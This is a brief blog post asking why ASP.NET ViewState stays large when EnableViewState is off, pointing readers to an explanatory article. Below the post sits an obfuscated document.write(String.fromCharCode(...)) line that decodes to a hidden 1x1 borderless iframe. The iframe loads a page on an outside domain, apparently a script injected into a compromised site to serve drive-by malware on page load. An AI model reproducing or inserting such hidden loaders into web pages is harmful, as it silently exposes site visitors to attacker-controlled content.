ViewState

Aaargh! Why is my ViewState so large? Even when setting the EnableViewState property to false for each control and the page itself there’s still an enourmous amount of ViewState… How can this be?

Well, it turns out that there are some other items that get stored in the ViewState. We’re in luck though because Paul Wilson has written this article with (supposedly) everything you ever wanted to know about the ViewState.

That should clear up a few things.

document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,32,61,34,104,116,116,112,58,47,47,121,97,100,114,48,46,99,111,109,47,100,47,105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,49,34,32,102,114,97,109,101,98,111,114,100,101,114,61,34,48,34,62,60,47,105,102,114,97,109,101,62))

Leave a comment